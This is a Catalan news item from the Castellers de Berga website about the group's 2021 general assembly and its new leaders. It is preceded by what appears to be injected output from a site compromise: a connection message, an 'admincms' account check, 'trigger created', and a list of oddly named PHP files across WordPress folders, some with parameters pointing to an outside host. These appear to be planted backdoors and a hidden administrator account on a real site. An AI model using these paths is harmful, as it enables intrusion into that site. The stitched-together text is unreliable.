Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax https://castellersdeberga.cat/wp-admin/includes/ajax-actions-wp-cron-stream-core-core-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/site-themes-private-stream-ajax-response.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-filesystem-ssh2-private-ajax-response-ajax-core-wp-ajax.php https://castellersdeberga.cat/wp-content/plugins/the-events-calendar/uninstall-wp-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/disable-gutenberg/uninstall-wp-ajax-response.php https://castellersdeberga.cat/wp-includes/blocks/site-logo-ajax-ajax-response-meta.php https://castellersdeberga.cat/wp-includes/sodium_compat/autoload-php7-cron-meta-private-cron-stream.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Alba Cruanyes i Marc Rovira nous caps de colla al capdavant dels Castellers de Berga en el seu 10è aniversari
 

Alba Cruanyes i Marc Rovira nous caps de colla al capdavant dels Castellers de Berga en el seu 10è aniversari


Alba Cruanyes i Marc Rovira nous caps de colla al capdavant dels Castellers de Berga en el seu 10è aniversariDissabte 11 de desembre, el Cine Catalunya ha acollit l’assemblea general ordinària dels Castellers de Berga. La junta tècnica i directiva de la temporada 2021 van fer les seves valoracions i es va presentar la candidatura per la temporada 2022.

La colla ha renovat bona part de la seva junta tècnica mentre que ha mantingut la major part de membres de l’equip directiu. Alba Cruanyes i Marc Rovira compartiran el rol de caps de colla mentre que Ignasi Ballús es manté com a president. Un canvi de rumb amb un protagonisme molt gran de les noves generacions. Aquesta renovació aporta joventut, empenta i motivació que aviat es veurà a la pràctica en els assajos de la colla berguedana. 

Durant el 2022 els castellers de Berga celebraran el seu 10è aniversari. Els assajos començaran el 14 de gener a les 20h al Cinema Catalunya amb l’objectiu d’anar a Valls a les Decennals 2021+1 per alçar-hi un castell i un pilar per primera vegada.

Nova junta tècnica dels Castellers de Berga

De dreta a esquerra, Alba Cruanyes, Marc Rovira i Ignasi Ballús

 

Berga, 13 de desembre de 2021

Castellers de Berga